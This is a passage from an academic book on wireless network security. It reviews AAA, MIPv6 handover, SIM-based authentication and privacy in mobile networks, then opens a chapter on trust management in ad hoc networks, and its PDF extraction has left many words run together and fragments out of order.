routing paths, or other methods. But in wireless significanttraffic.Thespecificationsallowahigh
environments, where terminals move around and blocking ratio of 20% for the UTMS network in
connect to different networks, which may be “far” case of requesting new AVs. The proposal claims
away in terms of network topology, switching the to lower this rate to 2%. For each authentication
data transfer path is a challenging task. instance,theSGSNconsumesoneAVfromafirst
In the IP world, Mobile IPv6 (MIPv6) was infirstout(FIFO)storage.
introduced to deal with mobility problems. This A fundamental question is to allow the size
protocolworksawlessly fl forclients - that
of theare AVchang
vector to be customised based on the
ing networks with quite low frequency and are terminal’s behaviour. In the default way, the SGSN
connected to a wired network, where additional executes a distribution of authentication vector
signalling and other overheads are not causing (DAV) procedure if all AVs are consumed. Com-
bandwidth problems. The convergence time of munication between the terminal and the SGSN
the routing in MIPv6 is quite slow. In a wireless cannot proceed until the reply is received from
environment every additional message exchange the HLR, inserting a potentially high delay into
orsignallingoverheadhasadirect - inflthe
uence onus
system. This can lead to call failure, errors in
ability. When the terminal is moving fast between location update, or unacceptable delays in services
these distant networks, it may reach a speed, where running on GPRS. The proposed protocol from
the routing of MIPv6 can not keep the connection Zhang and Fujise (2006) implies no change in case
inacorrectstate.Thismeansthatwhile ofthe data first authenticationtotheSGSN,butkeeps
traffic
could be able to transmit with low average speed, track of the number of available AVs and sends out
QoScannotbekeptonanadequatelevel - anew to request
sup whenhittingapredefinedlevel.This
portVoIPorVoDservices,forexample.Tofight level can be customised for a network, to reduce or
this problem, several micromobility (local area) even remove the possible delay of waiting for an
protocols were developed to support fast moving AV. The proposal also changes the basic behaviour,
nodes. Different approaches are used, for example asking for new AVs when they are consumed. The
in hierarchical MIPv6 with fast handover adds a lo- original 3rd Generation Partnership Project (3GPP)
cal home agent into the network. Seamless handoff system asks for them when a new event comes in
for MIPv6 tries to lower the handover time with and no AVs are available.
instructing the nodes to change networks based While reducing delay inside the GPRS network
on precalculated patterns. can reduce block probability in reaching network
Handoff between neighbouring IP networks services, also handover functions in IP have to be

revised in order to achieve reasonably fast mobil- was enabled by embedding the BU message into
ity support. The basic challenge is that currently the AAA request message and so optimising the
AAA and MIPv6 are operated independently. This route while authenticating. This solution can solve
means that the terminal has to negotiate with two MIPv6’s basic problem of supporting different
different entities in order to get access to the new administrative domains and enable scalable large
network. scale deployment.
In MobileIPv6, the terminal is allowed to keep Lee,Huh,Kim,andLeedefine 0 2 6) ( anovel
connections to a home agent (HA) and a cor- communication approach to enable communica-
respondent node (CN), even when the terminal tion between the visited AAA servers for a faster
changes point of attachment to that network. The andmoreefficientauthenticationmechanism.Ifa
terminal has two addresses, the home address terminal visits a remote network, the AAA must
(HoA) and the care-of address (CoA). The HoA be done by the remote system. IETF recommends
is fixed, but the CoA is generated by theintegrating visited Diameter-based authentication into
network. The mobile IP protocol binds these two the MIPv6 system. But, when the user is using
addresses together. To ensure an optimal rout- services on the remote network, the remote AAA
ing in the network, the terminals switch to route has to keep a connection with the home AAA.
optimalisation mode after joining a new network. The proposed new approach of Lee, Huh, et al.
Then it executes a return routability procedure suggests enabling faster authentication when the
and a binding update (BU) to communicate to the terminal moves between subnets inside a domain
correspondent node directly. The return routabil- by exchanging authentication data between visited
ity procedure consists of several messages, which AAA servers without the need of renegotiation
together induce a long delay. with the HA. Connection to the HA is needed
The handover between networks implies even only after the authentication when the terminal
more steps and consumes more time: movement executes a BU.
detection,addressconfiguration,homeBU, return
One other aspect is shown by Li, Ye, and Tian
routability procedure, and a BU to the correspon- (2006) suggesting a topology-aware AAA overlay
dent node. The terminal cannot communicate with network. This additional network could help MIPv6
the CN before the end of the procedure. to make more effective decisions and to prepare for
Fast handover capability is a major research handoversandotherchangesinnetwork - configura
item in IETF for MIPv6, including the standards tion. Based on the AAA servers and connections
FMIPv6 and HMIPv6. In addition to these schemes, between, a logical AAA backbone can be created,
Ryu and Mun (2006) introduce an optimisation in which can serve as administration backbone for the
order to lower the amount of signalling required and whole network. Signals delivered over this network
thus lower the handover delay between domains. are topologically aware, so the optimal route can
In an IPv6 system, the IP mobility and AAA are easily be selected and signalling messages can be
handled by different entities. This architecture transmitted over the best route. In exchange to
implies unnecessary delays. Several solutions are the build cost of this backbone network and some
proposed to enable the mobile terminal to build additional bandwidth consumed, MIPv6’s security
a security association between the mobile node and performance can be enhanced.
and the HA. This enables home BU during the As the route of the service access is secured,
AAA procedure. Route optimisation is a key topic optimised and delay reduced, one basic problem
in efficient mobility service provision. MIPv6
still remains: how to ensure that the user is the
optimises the route with the use of the return one, the network thinks he/she is. Lee, Park, and
routability procedure. In wireless environments, Jun (2006) suggest using smart cards to support
the generated signalling messages represent a con- interdomain roaming. The use of the SIM might
siderable part of the whole overhead. Moving route be preferable because of its widespread use and
optimisation into the AAA procedure can reduce cryptographiccapabilities(KálmánNoll, & .026)
the delay by nearly 50% (Ryu & Mun, 2006). This The problem of having multiple devices is also

raised here, since a system based on the SIM as manent subscriber identity and location data, which
smart card will require SIM readers in every de- will only be discoverable by the home register.
vice—if a secure key exchange method between The main drawback of the suggested protocol is
the devices is not in place. its higher computing requirements as compared to
Lee, Park, et al. (2006) suggest an entity called EAP-AKA, potentially limiting the applicability.
roaming coordinator ensuring seamless roaming
services in the converged network. This additional security and computing Power
node provides context management services and
enables seamless movement between the third A security protocol in a wireless environment
generation (3G) network and WLAN to enforce should be fast and secure, and it has to be effec-
security in converged networks. In order to provide tive in terms of computing power and low data
good user experience in a pervasive environment, transfer need. In low power environments an
additional intelligence needs to be added to the authentication scheme with high security and
traditional AAA systems to ensure that the terminal low computing power is advised. One solution is
selects the most appropriate connection method. based on hash functions and smart cards, allow-
This method has to be based on the context and ingminimisednetworktrafficandshortmessage
has to be supported in all networks. A smart-card- rounds used for authentication. Anonymity can
based secure roaming management framework be ensured through one-time passwords. While
enables the transfer of the terminals context with- accepting the advantages of a system with smart
out renegotiating the whole security protocol set. cards, the use of extra hardware like a card reader
When the terminal moves into a new network, the is not advisable, due to compatibility issues and
roaming coordinator, AAA servers, and proxies power requirements.
take charge of the authentication process. The Software-based solutions have an advantage, as
coordinator, having received a roaming request, they only require computing power. Showing the
evaluates the available networks and chooses the importance of power consumption, a comparison
best available one, and then triggers the context of cryptographic protocols is presented by Lee,
transfer between the corresponding AAA servers. Hwang, and Liao (2006) and Potlapally, Ravi,
When transferring whole user contexts, the system Raghunathan, and Jha (2006) showing, that twice
has to consider privacy requirements of the user’s of the transmit energy of one bit is needed to run
identityandhis/ herprofile. asymmetric encryption on that piece of informa-
tion. Symmetric encryption needs, in contrast,
Anonymity and Identity around one half of the transmit energy. Most over-
head is generated by session initialisation, meaning
In pervasive environments, privacy is of key im- longer sessions induce lower overhead. There is
portance. With computers all around, gathering a trade-off between security and session length.
information about traffic, movements, service
While negotiation overhead is getting lower with
access, or physical environment, customer privacy long sessions, security risks are getting higher.
must be protected. Køien (in press) suggests a This overhead can be lowered by special hard-
protocol, which is able to provide better protection ware or software solutions. Hardware needs some
for the user’s privacy than the normal 3G network. power and bigger silicon, while software requires a
Changes in the EAP-AKA protocol are suggested faster CPU. Hash functions have an energy require-
to use only random generated user authentication ment of around half a percent compared to PKI in
values. He defines three user contexts implying
generating session keys (Potlapally et al., 2006).
different key management and authentication KeyexchangeprotocolsusingellipticcurveDiffie-
schemes, like existing keys for short-term and Hellman(DH)comeoutmuchmoreenergyefficient
fresh keys for medium-term access. Identity-based as compared to the same traditional strength DH.
encryption is recommended to enableThe a exible
fl DH calculations demonstrate the trade-off
binding of the security context to protect the per- between power consumption and security. In order

tohaveanefficientoperation,thesecurity exampleprotocol
Kerberos or RADIUS. A special aspect
needs to have the possibility to adapt encryption to of resource access over the home LAN is that
the needs of the current application. Authentication specificprivilegesaregiventoselectedprograms
token generation can be problematic for devices The AAA server maintains an access control list
with limited computing capabilities. Personal area to ensure correct privilege distribution.
networks (PAN) with multiple devices raise this To build the initial trust relationships some
problem by their very nature. kind of user interaction is needed. The key should
initially be distributed out-of-band, for example
security in Personal Area and Home on an USB stick, or by using short range wireless
networks technology, Near Field Communication (NFC), for
example (Noll, Lopez Calvet, & Myksvoll, 2006).
Efficientauthenticationandcertificate management
On home networks, where power consumption is
ensures better usability of PAN devices. By using not a problem, PKI may be used for negotiating ses-
efficient security protocols, content- - adaptive en
sion keys between devices, since key management
cryption,efficientkeyandcertificatemanagement, in a PKI is simpler than in symmetric encryption
considerably longer battery operation is achievable. andthedelaycausedbycheckingcertificatesand
To enable key management in a PAN a personal so forth will not be noticeable in this environment.
certificateauthorityCA) ( entityissuggested Sur
(
Users authenticated towards the AAA infrastruc-
& Rhee, 2006; Sur, Yang, and Rhee, 2006), which ture can access the resources seamlessly. Initial
willberesponsibleforgeneratingcertificates authentication isfor done with PKI. In case of mobile
all mobile devices within the PAN or home device devices, also the home AAA can use previously
domain (Popescu, Crispo, Tanenbaum, & Kam- calculated hash values in chain to lower compu-
perman, 2004). Because of the context of use, the tational cost. These AAA infrastructures can be
authenticationprotocolisfocusedon efficiency
connected to abyproviders AAA, for example to
reducing computational overheads for generating use in digital rights management (DRM) or home
and verifying signatures. service access from a remote network (Popescu
Main focus is on reducing PKI operations, et al., 2004).
which have been proven to be energy consuming. A user moving with his/her devices to the
Instead, it proposes to use hash chains to lower com- home raises another AAA challenge, the mobile
munication and computational costs for checking nodes.
certificates.Formerresearchsuggestedhashtrees
in order to authenticate a large number of one-time Mobile nodes (network Mobility)
signatures. By extending these with fractal-based
traversal, it has been proven that these trees provide Movement of whole networks like PANs or net-
fast signature times with low signature sizes and works deployed on a vehicle, introduce a new
storage requirements. The personal CA has to be level of AAA issues. In a conventional network a
a unique trusted third party in the PAN. It needs standard mobility support does not describe route
to have a screen, a simple input device, and has to optimisation. Several procedures are suggested to
always be available for the members of the network. provide this functionality for mobile nodes, like
A cell phone with the SIM is a perfect candidate to Recursive Binding Update Plus (RBU+), where
beapersonalCA(Kálmán&Noll,.026) route optimisation is operated by MIPv6 instead
In home environments, basically two types of of the network mobility (NEMO) architecture. This
authentication are distinguished: (1) user authenti- means, that every node has to execute its own BU
cation, and (2) device authentication (Jeong, 2006). with the corresponding HAs. To solve problems
Mutual authentication has to be used in order to with pinball routing, it uses the binding cache in
prevent impersonation attacks (identity theft). This the CN. When a new BU message arrives, the
requires an SSO infrastructure, which can be for RBU+ has to execute a recursive search, which

leads to serious delays with a growing cache size. After these technical issues of authentication
One potential route optimisation is presented by the next chapter will deal with authentication from
Jeong (2006). the user viewpoint.
A designated member of the network, called a
mobile router is elected to deal with mobility tasks customer Ergonomics
to reduce network overhead. The AAA protocol
for this environment defines a handover Therescheme
is always a trade-off between user security
andtree-basedaccountingtoenable - efficient
and ease of opti
use. If the system is prompting for a
misation. They recommend using dual BU (DBU) password for every transaction, it can assume with
procedure instead of the existing procedures like quite high probability, that the access is enabled
RBU+ as a solution for the reverse routing problem just for the correct user. But, that is unacceptable
raised by mobility. DBU operates with additional for most of the users in private environments,
information placed into the messages sent in a BU where convenience is more valued than security.
process. This is the CoA of the top level mobile In corporate networks, policies are just enforced
router (TLMR). By monitoring the messages, the and users have to accept it. It would however be
CNs in the subnet can keep optimal route towards problematic if the credentials were only asked once
the TLMR. at start-up or connecting to the network, since
Moving subnets are the subject of eavesdrop- mobile devices are threatened by theft, loss, and
ping and possible leakage of the stored secrets. A other dangers by their nature of use.
secure AAA is proposed for network mobility over Smart cards could be a solution to have a good
wireless links, which deals with these problems trade-off between the usability and security. Since
(Fathi et al., 2006). Secret leakage can be caused the user will have a token, which he/she has to care
by malicious eavesdroppers, viruses, or Trojans. A of, and exchange keys generated by it, at least it
possibility is to store the keys in tamper resistant could be secured that the user who is accessing a
modules, like smart cards, the SIM, or trusted specified service holds the authentication to
hardware modules. Deploying additional modules The mobile phone with the integrated smart card,
can be problematic and expensive. Fathi et al. pro- the SIM, is a potential tool for this purpose. As
pose a protocol based on a short secret, which can indicated by Leu et al. (2006) the requirement of
be remembered by humans and used in a secure carrying a SIM reader or equipping all the equip-
protocol called Leakage-resilient authenticated ment with SIM cards is neither convenient nor cost
key exchange protocol (LR-AKE). This protocol effective. The possibility of secure key exchange
is used for AAA to reduce NEMO latency under between user equipment shall be provided.
300 ms in order to provide session continuity, for The cell phone can act as a key negotiator,
example in VoIP applications, which is important with its tamper resistant cryptographic functions
in keeping a good user experience. However, short integrated into the SIM and then exchange the
passwords as proposed with LR-AKE are not advis- session keys with other terminals with the use of
able. If complex, they will be noted down by the a short range wireless solution. Currently, most of
user, and if weak, they are easy to guess. the security problems, besides the user behaviour,
As network mobility has considerable security are coming from security holes in the software.
issues, it may be not the way to go. Functionality Having the capability to download new software
of a mobile network might be achieved by using over the air to the phone ensures the use of recent
a dedicated device as a gateway of the PAN. Only updates and eliminates this type of security threat
this device will show up in the wireless network, (Kálmán & Noll, .026)Compared to a security
andalltrafficoriginatingandarriving toitthe
token, mayPAN
be better to use the phone, since the
will go through this device and its HA. SIM card can be locked by the provider, so if the
device gets lost, the authentication credentials can
be withdrawn within short time.

outlook nomical area has to point out new objectives to

ensure a good working, open, and secure AAA
Current research is focused on merging basic infrastructure which can be used by every service
network functions to enable pervasive computing provider while keeping information exchange on
the required minimal level.
and network access. The result of these efforts is a
converged infrastructure, which is able to handle
most of user needs in high quality. The problem of
QoScontrolinwirelesssystemsremains anopen
conclusIon
one, but experiences of VoIP and VoD services
in wireless networks show the adaptability of the The biggest effort in AAA systems is on extend-
user to the current environment. ing the capabilities of the existing solutions in
Mobility of packet data is still to be enhanced, telecommunication and in computer networks to
with the challenge of reducing the handover delay. an integrated network approach enabling seamless
Remote access to home content is just beginning service access of mobile users.
to be spread between early adopters. MIPv6 will While telecom solutions are usually more se-
address most of the issues sometime in the future, cure, user privacy is not a primary concern here. In
and with the promising extensions, the protocol computer networks AAA solutions are more open
will be able to handle sessions together with the andexible,
fl whilethewidespreadmodelof“web
AAA infrastructure without service interruption. of trust” methods is not acceptable for commercial
Mobile networks will use WLAN as a high capac- service exchange. Ongoing research indicates the
ity data service, although upcoming solutions and potential for a common mobile/Internet authentica-
MIPv6 extensions may be able to threaten their tion suite, potentially based on the EAP.
use inside dense populated areas, assuming global Interworking issues between mobile and wire-
Wi-Fi roaming mechanisms are in place. less networks are the basis for detailed research
Efforts are being made towards an easy de- on handover delay, multi-device roaming, mobile
ployable home AAA infrastructure, which can networks, security, ease-of-use, and anonymity
later bear the tasks associated with inner (user of the user. This chapter provided an overview
management, remote access, user content DRM, of the state of the art in authentication for mobile
purchased media DRM) and outer (authentication systems.
towards corporate, provider- or public-based AAA) Extended AAA mechanisms are suggested
authentication and access control. for home and community networks, taking into
Educating the user might be the biggest chal- account security and privacy of the users. These
lenge, as mobile phone users represent the whole networks will keep a high amount of personal data,
population, and not just the educated computer and thus need stronger privacy protection mecha-
community. The enforcement of the use of smart nisms. By using link layer encryption, smart cards,
cards is advisable, where the possible use of the and secure key transfer methods the security and
mobile phone shall be investigated. privacy protection can be greatly enhanced.
Now, we can experience the dawn of new
social and community services over the Internet.
This raises the problem of privacy protection as rEfErEncEs
never before. AAA services must take care of
user credentials, and even must ensure that data Chowdhury, M. M. R., & Noll, J. (2007). Ser-
collected from different AAA providers cannot be vice interaction through role based identity. In
merged. So, research in the area of one-way func- Proceedings of the The International Confer-
tions, blind signatures, and different PKI methods ence on Wireless and Mobile Communications
is recommended. (ICWMC2007).
Finally, current market players also have to
change their business plans. Research in the eco-

Fathi, H., Shin, S., Kobara, K., Chakraborty, S. Lee, S.-Y., Huh, E.-N., Kim, Y.-W., & Lee, K.
S., Imai, H., & Prasad, R. (2006). LR-AKE-based .026)( An efficient authentication mechanism
AAA for network mobility (NEMO) over wireless for fast mobility service in MIPv6. In Computa-
links. IEEE Journal on Selected Areas in Com- tionalScienceandItsApplications—ICCSA026
munications, 24(9), 1725-1737. (LNCS 3981).
Janevski, T., Tudzarov, A., Janevska, M., Stojanovs- Leu, J.-S., Lai, R.-H., Lin, H.-I., & Shih, W.-K.
ki, P., Temkov, D., Kantardziev, D., et al. (2006). (2006). Running cellular/PWLAN services:
Unified billing system solution for interworking Practical considerations for cellular/PWLAN ar-
of mobile networks and wireless LANs. In Pro- chitecture supporting interoperator roaming. IEEE
ceedings of the IEEE Electrotechnical Conference Communications Magazine, 44(2), 73-84.
MELECON026 (pp. 717-720).
Li, J., Ye, X.-M., & Tian, Y. (2006). Topologi-
Jeong, J., Chung, M. Y., & Choo, H. (2006). Secure cally-aware AAA overlay network in mobile IPv6
user authentication mechanism in digital home net- environment. In Networking026 (LNCS 3976).
work environments. In Embedded and Ubiquitous
Long, M., & Wu, C.H.
- .026)(Energy-efficient
Computing (LNCS 4096).
and intrusion-resilient authentication for ubiquitous
Jeong, K. C., Lee, T.-J., Lee, S., & Choo, H. (2006). accesstofactoryoor fl information.
IEEE Transac-
Route optimization with AAA in network mobil- tions on Industrial Informatics, 2(1), 40-47.
ity. In Computational Science and Its Applica-
Noll, J., Lopez Calvet, J. C., & Myksvoll, K. (2006).
tions—ICCSA026 (LNCS 3981).
Admittance services through mobile phone short
Kálmán, Gy., Chowdhury, M. M. R., & Noll, J. messages. In Proceedings of the International
(2007). Security for ambient wireless services. In Conference on Wireless and Mobile Communica-
Proceedings of the th 56 IEEEVehicularTechnol
- tionsICWMC’06.
ogyConference(VTC2. )70
Popescu, B. C., Crispo, B., Tanenbaum, A. S., &
Kálmán, Gy., & Noll, J..026)(SIM as a key of Kamperman, F. L. A. J. (2004). A DRM security
user identification: Enabling seamless - user iden
architecture for home networks. In Proceedings
tity management in communication networks. In of the 4th ACM Workshop on Digital Rights Man-
Proceedings of the WWRF meeting #17. agement.
Khara, S., Mistra, I. S., & Saha, D. (2006). An alter- Potlapally, N. R., Ravi, S., Raghunathan, A., & Jha,
native architecture for WLAN/GPRS integration. N. K. (2006). A study of the energy consumption
In ProceedingsoftheIEEEVehicularTechnology characteristics of cryptographic algorithms and
Conference,026,VTC026 (pp. 37-41). security protocols. IEEE Transactions on Mobile
Computing, (2), 5 128-143.
Køien, G. M. (in press). Privacy enhanced mobile
authentication. Wireless Personal Communica- Ren, K., Lou, W., Kim, K., & Deng, R. (2006).
tions. A novel privacy preserving authentication and
access control scheme for pervasive computing
Lee, C.-C., Hwang, M.-S., & Liao, I.-E. (2006).
environments. IEEE Transactions on Vehicular
Security enhancement on a new authentication
Technology,5 (4), 1373-1384.
scheme with anonymity for wireless environments.
IEEETransactionsonIndustrialElectronics, (5), Ryu, S.,3 5 & Mun, Y. (2006). An optimized scheme
1683-1687. for mobile IPv6 handover between domains based
on AAA. In Embedded and Ubiquitous Computing
Lee, M., Park, S., & Jun, S. (2006). A security
(LNCS 4096).
management framework with roaming coordinator
for pervasive services. In Autonomic and Trusted Sur,C.Rhee,
&, K.H.
- An
.026)( efficientauthen -
Computing (LNCS 4158). ticationandsimplifiedcertificate - statusmana

ment for personal area networks. In Management tion with digital media provider companies, but in
of Convergence Networks and Services (LNCS pervasive environments, users may also require a
4238). waytohaveafine-grainedsecurityinfrastructure
in order to control access to own content.
Sur, C., Yang, J.-P., & Rhee, K.-H. (2006). A new
efficientprotocolforauthenticationand certificate
Extensible Authentication Protocol (EAP):
status management in personal area networks. In EAP, a exible
fl protocol family, which includes
ComputerandInformationSciences—ISCIS 026 IKE protocols, and also the default authen-
TLS,
(LNCS 4263). tication method of UMTS, EAP-AKA.
Zhang, Y., & Fujise, M. (2006). An improvement International Mobile Subscriber Identity
for authentication protocol in third-generation (IMSI), Temporary-IMSI (TMSI): IMSI and
wireless networks. IEEE Transactions on Wireless TIMSI is the unique identity number used in
Communications, 5
(9), 2348-2352. UMTS to indentify a subscriber. The temporary
one is renewed from time to time, and that is the
only one that is used over the air interface.
kEy tErMs Public Key Infrastructure (PKI): PKI is a
service that acts as a trusted third party, manages
Authentication, Authorisation, and Ac- public keys, and binds users to a public key.
counting (AAA): AAA is a system that handles
all users of the system to ensure appropriate right Remote Authentication Dial in User Ser-
management and billing. vice (RADIUS): RADIUS is the de facto remote
authentication standard over the Internet. It uses
Converged Network: Converged network is UDP as a transport method and is supported by
anetworkcarryingvarioustypesoftraffic. Such
software and hardware manufacturers. Privacy
a network is providing services to different ter- problems may arise when used on wireless links,
minals, which can access and exchange content since only the user password is protected by an
regardless of the current networking technology MD5 hash.
they are using.
Rivest-Shamir-Adleman (RSA): RSA is the
Diameter: Diameter is a proposed successor de facto standard of public key encryption.
of RADIUS. It uses TCP as a transport method
and provides the possibility to secure transmis- Smart Card: Smart card is a tamper resistant
sions with TLS. It is not backward compatible pocket sized card, which contains tamper resistant
with RADIUS. non-volatile storage and security logic.
Digital Rights Management (DRM): DRM Subscriber Identity Module (SIM): SIM is the
is a software solution that gives the power for the smart card used in GSM and UMTS (as USIM) net-
content creator to keep control over use and redis- works to identify the subscribers. It has integrated
tribution of the material. Used mostly in connec- secure storage and cryptographic functions.

Chapter XIV
Trustworthy Networks,
Authentication, Privacy,
and Security Models
Yacine Djemaiel
Slim Rekhis
Noureddine Boudriga
AbstrAct
Wireless networks are gaining popularity that comes with the occurrence of several networking technolo-
gies raising from personal to wide area, from centralized to distributed, and from infrastructure-based
to infrastructure-less. Wireless data link characteristics such as openness of transmission media, makes
these networks vulnerable to a novel set of security attacks, despite those that they inherit from wired
networks. In order to ensure the protection of mobile nodes that are interconnected using wireless pro-
tocols and standards, it is essential to provide a depth study of a set of mechanisms and security models.
In this chapter, we present the research studies and proposed solutions related to the authentication,
privacy, trust establishment, and management in wireless networks. Moreover, we introduce and discuss
the major security models used in a wireless environment.
IntroductIon In order to protect such networks, multiple security

solutions were proposed for the authenticating of
Wireless networks are gaining popularity. Such users, ensuring privacy, and establishing trust.
popularity comes with the occurrence of several Deploying wireless networks without considering
networking technologies raising from personal the threats associated to this technology may lead
to wide area, from centralized to distributed, and to the compromise of the interconnected resources
from infrastructure-based to infrastructure-less. and also the loss of security.
However wireless data link characteristics such as To ensure the protection of mobile nodes that
openness of transmission media, make these net- are interconnected using wireless protocols, several
works vulnerable to a novel set of security attacks. security mechanisms and security models have
Trustworthy Networks
been provided. The solutions were made to cope makes trust management a challenging problem
with the features of the wireless environment and to address.
the mobile nodes. In this chapter, we present the
research work and security solutions related to trust Establishment basis
authentication, privacy, and trust management.
Moreover, we introduce and discuss the major Trust describes a set of relations among entities
security models used in a wireless environment. engaged in various protocols, which are established
The first section of this chapter takes based on interest
a body of assurance evidence. A trust is
to the concept of trust, which can be defined established as between two different entities further
the firm belief in the competence of an entity to
to the application of an evaluation metric to trust
act dependably, securely and reliably within a evidence. The established relations may be com-
specifiedcontext.Startingfromthisdefinition, posed with otheritis trust relations to generate new
significantthattrustimpliesalevel ofuncertainty
relations. Trustmayinfluencedecisionsincluding
and judgment. This may depend on many factors access control. To clarify the process of trust es-
due to risks associated to wireless networks. In this tablishment, we consider the following example.
section,wedefinethetrustinwireless context
Assume and
two trust relations A and B. Relation A
discuss its models. states that “acertificationauthorityCA1accepts
The second section discusses the authentication, entity X’s authentication evidences” and is estab-
which is a crucial mechanism that ensures that a lished off-line upon delivery of some evidences
resource is used by the appropriate entities. Actors, (e.g., identity, employment card) by X to B. Upon
architecture, and issues related to authentication theestablishmentofA,thecertificationauthor
in wireless environment are discussed. CA1 issues a certificate binding a public key to
The third section discusses authentication X. Then, it stores the relation in its trust database
models and protocols in wireless LAN (WLAN), registeringXwithitscertificate. B statesRelation
cellular, ad hoc, wireless mobile access networks that “acertificationauthorityCA2acceptsCA1’s
(WMAN) networks. As Mobile IP is becoming authentication of any entity registered by CA1”.
a unifying technology for wireless networks, To establish B,certificationauthority CA2 may ask
allowing mobile nodes to change their point of CA1 to deliver some evidences such as: (1) CA1’s
attachment without loosing their connections, a authentication of entities is done using satisfac-
particular interest is also given to authentication tory mechanism and policy; and) certification 2(
in Mobile IP. authority CA1’s trust database is protected using
The fourth section of this chapter discusses satisfactory security mechanisms and policies.
privacy regarding location and transaction in wire- The establishment of such trust relation leads to
less environment. The fifth section presents the publication two of a certificate CA2,signed by
aspects regarding security modeling in wireless associating CA1’s public key. The relation is then
environments. The first is related - to the
stored inspecifi
CA2’s trust database. The composition
cation of trust, modeling, and verification. of the twoThe trust relations leads to the acceptance
secondaddressesthespecificationand verification
of CA1’s authentication of X by CA2.
of security policies that take into consideration One of the main properties that need to be
wireless threats. handled during trust establishment techniques is
transitivity. To decide whether a trust relation is
transitive or not, evidences used to establish trust
trust MAnAgEMEnt should ensure (1) availability, meaning that evi-
dences can be evaluated at any time by the entities
Trust management represents the skeleton of any wishing to establish trust; (2) uniformity, meaning
network security framework. The absence of a that evidences satisfy the same global metrics of
centralized entity, for example, in ad hoc networks adequacy, (3) stability, which means that authen-
0
tication mechanism cannot change accidentally or establish trust. Therefore, trust relations should
intentionally, and (4) log-term existence, meaning be established using incomplete or uncertain trust
that evidences last as long as the time used to gather evidences, based on the incomplete amount of
and evaluate it. information that each node holds.
When nodes plan to communicate, they must
need for trust Management in Mobile initially interact with each other and establish a
networks certain level of trust. The change of such level
may be triggered further to interaction between
While there are extensive research works that neighboring nodes or further to a recommenda-
contributed to the management of trust in complex tion from a third party. As a node in the MANET
systems, the great majority of them was set up for has only a partial view of the whole network, ad-
fixed infrastructures; assumed long- - term
ditionalavail
mechanisms should be designed to allow
ability and validation of evidences; and generated these nodes identifying valid trust evidences and
lengthy validation process. Several characteristics prevent intruders from altering them or modify-
of wireless networks including unreliable transmis- ing the trust value of other nodes. To clarify this
sion range and topology changes made trust man- issue, Figure 1 depicts two networks. In the first
agement a challenging task. The focus on ad hoc network, users User1x need to communicate very
networks was based on the fact that these networks often with server Server1. In the second network,
are self-organized and barely suppose the existence users User2x need to communicate very often
of trustworthy nodes. In infrastructure-based wire- with server Server2. Different trust relations can
less networks such as cellular networks and WLAN, be established. Nodes in network 1 and 2 trust
the base stations (BSs) (or access points [APs]) are each otherbasedonidentitycertificateswhicha
considered trustworthy. Three main requirements registered bycertification CA1 authority
and CA2,
needtobefulfilledbytrustestablishment process
respectively. In this scenario, User12 has lost com-
in wireless ad hoc networks. First, trust should be munication with server 1 and User11, because it
established in a distributed manner without a pre- moved out of the coverage. Some among User2x can
established trust infrastructure. In fact, connectiv- be found under the communication range of User12.
itytocertificationauthorities’directory servers
To reach Server1, User12in has to authenticate itself
the node’s home domain cannot be guaranteed in to any User2x and get access to the second ad hoc
mobile ad hoc network (MANET) when needed. network. To do so, User1 2 provides itscertificate
As a consequence, trust establishment in MANET (as signed by CA1) to User21. User21 has to decide
must support peer-to-peer trust relations. whether to accept such trust evidence. Assume now
Second, trust establishment should be per- that the access policy requires that any node that
formed online and trust relations should have wants to access the ad hoc network should provide
short-life period. This is mainly due to the fact that avalididentitycertificatefromatrustedauth
in MANET, when a node moves randomly from a Thus,User21shouldcontactitstrusted - certifica
location to another, its security context may change. tion authority CA2
( ) and get the CA1 certificate
For instance, when a node moves to a location in signed by CA2. After that, User21 will be able to
which its compromise becomes possible, any trust validthecertificateofUser12.Transitivityofthe
relation that involves such node should be with- trust relation is thus established.
drawn. Such behavior should not affect network
connectivity and new trust evidences should be recent Advances in trust
gathered as a consequence. Third, trust establish- Management
ment should be tolerant to incomplete evidence or
unavailable trust relations. In fact, in MANET, it Former trust establishment solutions focused
becomes unfair to suppose that all evidences are mainly on procedures to locate the communicating
available to all nodes when they are required to peer’s certificate in order to determine - the cr

Figure 1. Trust establishment in ad hoc network
CA CA
Server
Server
User User
User
User
Ad-hoc network User
Broken link
Communication link
Ad-hoc network
Trust relation
tographic key. In this context, Balfanz, Smetters, contains the signature on the selected binding
Stewart, and Wong (2002) base its solution on from the received secret list. These certificat
using a location-limited channel to allow nodes will therefore be stored locally. The value of k is
performing pre-authentication of each other. As chosensothatthereisasufficienttrustrelati
the propagation of the channel is limited, intrud- in the network and the distribution scheme should
ers have an outside chance to mount a successful ensure the certainty of being able to establish a
passive attack. While pre-authentication does not trust chain between any two nodes.
require a heavy bandwidth, the existence of loca- After the system bootstrapping - phase is fin
tion-limited channel represents a very restrictive ished, there is no need for the secret dealer to
assumption. The approach proposed in Ren et al. continue existing. To accommodate the dynamic
(2004) assumes a minimum storage requirement changing of the network structure, every node is
to establish trust in mobile ad hoc networks. A assumed to be able to establish independent trust
centralized secret dealer is introduced into the relationship with at least two nodes.
network during the system bootstrapping phase When a node leaves the network properly, it
and is supposed to be trusted by all nodes. Every broadcasts information about its departure and
node is assumed to have a pair of public/private signs them. Consequently, the receiving nodes
key where the public key is known by the secret revokethecertificatethatwasissued - tothat
dealer. ing node. One major advantage of this solution
Inthefirstpart of
bootstrapping, every network lies in the fact that (1) it decreases the length of
node receives a pre-computed short list, say SL, the trust path, and (2) it is slightly affected by the
from the secret dealer. SL represents k tuples bind- dynamic nature of the ad hoc network. However,
ingnodeidentifierstorelatedpublic keys.These
guaranteeing that sufficient trust relation
bindings are distributed symmetrically, meaning exist in the network requires a large care during
thatifnodejreceivesthenodeidentifier ofiof
the selection and
value of k.
its corresponding public key, then node i will also On one hand, the work in Baras and Jiang
receivesnodeiidentifieranditspublic (2004)key.Intheto investigate the stability of trust
proposed
second part of the bootstrapping phase, each node establishment by modeling a MANET as an indirect
generates k certificates, one certificate for every
graph where edges represent pre-trust relations.
receivedbinding,assumingthateveryThe certificate
two authors cast the problem of trust com-

putation and evaluation by every individual node etc.). Finally, a TTP is an entity that is mutually
as a cooperative game and base it on elementary trusted by the supplicant and the authenticator and
voting methods. In Theodorakopoulos and Baras facilitating mutual authentication between the two
(2004), the process of trust relation establishment parties (Aboudagga, Refaei, Eltoweissy, DaSilva,
is formulated as a path problem on a weighted Quisquater,
& An
.)052 authenticationprocessis
directed graph. The vertices in the graph represent made up of a set of messages that are exchanged
the entities and a weighted edge (i, j) represents between these actors (as e illustrated by Figure
the opinion that entity i has about entity j. Such 2). Authentication includes four components as
